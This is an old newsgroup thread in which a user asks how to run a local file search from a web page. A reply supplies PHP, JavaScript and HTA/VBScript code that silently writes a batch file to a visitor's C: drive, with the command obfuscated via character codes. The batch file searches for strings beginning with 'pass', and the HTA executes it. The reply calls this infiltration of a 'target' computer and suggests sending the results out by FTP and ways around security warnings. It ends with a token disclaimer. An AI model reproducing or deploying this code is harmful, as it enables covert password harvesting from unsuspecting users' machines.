The Magpie wrote:
Ray Muforosky wrote:
Task: I want to do file search, using the "conatining text" option from
a web page.
Most modern browsers have implemented a cross domain access policy for
client side scripting
making it near impossible to effectively achieve this task with
standard HTML.
MSIE's HyperText Applications (*.HTA) on the other hand is a much more
promiscuous doctype and
can access the coveted protected local domain.
Furthermore .exe's can be arbitrarily executed from .HTA's in IE.
How do I search for a file on my local drive containing a certain
string, from a web page.
The XP command line to search for a string (in this case strings with
words starting with pass) and save the results would be something
like:
findstr /p /i /s "\<pass.*" c:\*.* c:\pass.txt
Full syntax reference:
http://www.microsoft.com/resources/d...s/findstr.mspx
Still at this point even though we can pop open an exe via script in
IE's chromeless client how are we going to pass the command line switch
variables ?
All those slashes and wildcards don't look like they'd make very good
tag soup.. maybe encode it. Dunno if the direct approach would work too
smoothly though.
That is, how do run the windows search program
from a web page.
Not, I am sure, by using Javascript - so I am afraid you will probably
need to ask in a Microsoft newsgroup.
A possible workaround is to pass the command switchs via file
encapsulation and deliver it via a local file exploit (created by
SPTH)~
Use PHP & JavaScript to write a local bat (on your targets compouter)
containing your findstr search line, and then in theory auto refresh to
an .HTA which executes the local .bat with VBScript ..
File: search.php
<?
$nl=chr(13).chr(10);
echo '<html><head>';
echo '<script language='.chr(34).'JavaScript'.chr(34).'>'.$nl;
echo 'function go(){'.$nl;
echo 'var fso=new
ActiveXObject('.chr(34).'Scripting.FileSystemObjec t'.chr(34).')'.$nl;
echo 'var
file=fso.CreateTextFile('.chr(34).'C:\\\search.bat '.chr(34).')'.$nl;
$cont="findstr /p /i /s \"\<pass.*\" c:\*.* c:\pass.txt";
$i=0;$nc='';
echo 'file.Write(';
while ($i<strlen($cont)){
echo 'String.fromCharCode('.ord($cont{$i}).')+';
$i++;
}
echo chr(34).chr(34).')'.$nl;
echo 'file.Close()}'.$nl;
echo '</script>';
echo '<meta http-equiv=refresh content=15
url='.chr(34).'run.hta'.chr(34).'>';
echo '</head>';$nl.$nl;
?>
<body language="JavaScript" onload="go()"></body></html>
Code lifted and warped from:
http://vx.netlux.org/lib/vsp13.html
File: run.hta
<html>
<head>
<HTA:APPLICATION ID="HTA"
VERSION="1.0"
APPLICATIONNAME="RemoteSearch"
BORDER="thin"
BORDERSTYLE="normal"
CAPTION="yes"
CONTEXTMENU="no"
ICON=""
INNERBORDER="yes"
MAXIMIZEBUTTON=no"
MINIMIZEBUTTON="no"
NAVIGABLE="yes"
SCROLL="no"
SCROLLFLAT="yes"
SELECTION="yes"
SHOWINTASKBAR="yes"
SINGLEINSTANCE="yes"
SYSMENU="yes"
WINDOWSTATE="normal"
/>
<script language="VBScript">
Dim objShell
Sub Run(Name)
Set objShell = CreateObject("WScript.Shell")
objShell.Run Name
On Error Resume Next
Set objShell = Nothing
End Sub
</script>
</head>
<body onload="javascript
:Run('file://C:/search.bat');"></body></html>
Code lifted and warped from:
http://www.experts-exchange.com/Web/..._20709676.html
So there we go (it's not tested but the example is based on working
concepts)..
We've infiltrated, searched and even logged the results.. now all you
have to do is recover the data (perhaps via another line in the bat to
ftp the file)..
The above php/js exploit should write local files without warning.. hta
files on the other hand pop up an alert box while loading.. plus any
clever malware scanner would probably spot or prevent the process.
You may be able to write the .hta locally and then load it to get
around the warning.. or maybe not.. either way it's going to be mighty
obvious when the dos box pops up for a few seconds (or minutes if
you're searching alot of local sub-directories).
Disclaimer: The examples are provided for entertainment / edu only. I
take no responsibility for how you implement this code, if it violates
your hosts TOS or if it destroys your computer or the computer of any
user that YOU subject to it's wrath. If I were you I'd accept that it's
a bad idea and totally against general net etiquette; an obvious
violation of privacy, and could potentially get you arrested very
quickly.